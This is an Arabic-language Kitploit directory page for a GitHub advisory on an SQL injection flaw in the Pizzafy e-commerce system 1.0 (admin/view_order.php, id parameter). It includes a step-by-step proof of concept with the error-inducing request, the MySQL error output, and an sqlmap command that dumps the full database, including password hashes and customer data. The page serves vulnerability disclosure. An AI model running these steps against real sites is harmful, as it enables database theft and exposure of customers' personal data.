Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-7394-SQLI | Kitploit
أدوات/GitHubGitHub/xmyronn/cve-2026-7394-sqli
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن قواعد البيانات
GitHubxmyronn/cve-2026-7394-sqli

CVE-2026-7394-SQLI

عرض المستودع
منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حقن SQL في نظام التجارة الإلكترونية Pizzafy — admin/view_order.php

التفاصيل

الحقلالقيمة
المورّدSourceCodester
المنتجنظام التجارة الإلكترونية Pizzafy باستخدام PHP وMySQL
الإصدار1.0
الثغرةحقن SQL (SQL Injection)
CWECWE-89
درجة CVSSv37.2 (عالية)
متجه الهجومالشبكة
المصادقة المطلوبةنعم (مسؤول)
الباحثXmyronn
التاريخ2026-04-11

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html


المكوّن المتأثر

الملف: Pizzafy/admin/view_order.php
المُعامل: id (GET)


الوصف

نقطة النهاية admin/view_order.php في نظام Pizzafy للتجارة الإلكترونية 1.0 تفشل في تعقيم مُعامل id (GET) بشكل صحيح قبل تمريره إلى استعلام MySQL. يمكن للمسؤول المُصادَق عليه التلاعب بهذا المُعامل لحقن استعلامات SQL عشوائية، مما يؤدي إلى اختراق قاعدة البيانات بالكامل.


إثبات المفهوم

الخطوة 1 — تسجيل الدخول كمسؤول

انتقل إلى:

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php

سجّل الدخول باستخدام بيانات اعتماد المسؤول.

الخطوة 2 — الانتقال إلى الطلبات

root@kitploit:~
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
Screenshot 2026-04-11 212106

انقر على عرض الطلب في أي إدخال طلب. Screenshot 2026-04-11 212116

الخطوة 3 — اعتراض الطلب في Burp Suite

يبدو طلب GET المعترَض كما يلي: Screenshot 2026-04-11 212135

الخطوة 4 — إحداث خطأ SQL

غيّر id=1 إلى id=': Screenshot 2026-04-11 212145

root@kitploit:~
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1

الاستجابة — خطأ MySQL مُكشوف:

root@kitploit:~
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15

الخطوة 5 — الاستغلال باستخدام sqlmap

احفظ الطلب في view_order.txt وشغّل:

root@kitploit:~
sqlmap -r view_order.txt --dump --batch
Screenshot 2026-04-11 212406

أكّد sqlmap أنواع الحقن التالية:

النوعالوصف
Boolean-based blindAND boolean-based blind — WHERE clause
Error-basedMySQL >= 5.0 FLOOR error-based
Time-based blindMySQL >= 5.0.12 SLEEP
UNION queryGeneric UNION query — 11 columns

تم تفريغ قاعدة البيانات بالكامل:

root@kitploit:~
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings

تشمل البيانات الحساسة المكشوفة تجزئات كلمات المرور bcrypt، ورسائل البريد الإلكتروني للعملاء، وتفاصيل الطلبات، وإعدادات النظام.


الأثر

يمكن للمسؤول المُصادَق عليه الخبيث (أو المهاجم الذي حصل على بيانات اعتماد المسؤول) أن:

  • يفرّغ قاعدة البيانات بالكامل بما في ذلك تجزئات كلمات المرور
  • يقرأ معلومات التعريف الشخصية الحساسة للعملاء (الأسماء، ورسائل البريد الإلكتروني، والعناوين، وأرقام الهواتف)
  • يكتب في قاعدة البيانات بشكل محتمل

المراجع

  • SourceCodester — نظام Pizzafy للتجارة الإلكترونية
  • CWE-89: التعقيم غير السليم للعناصر الخاصة المستخدمة في أمر SQL.
تنزيل الأداة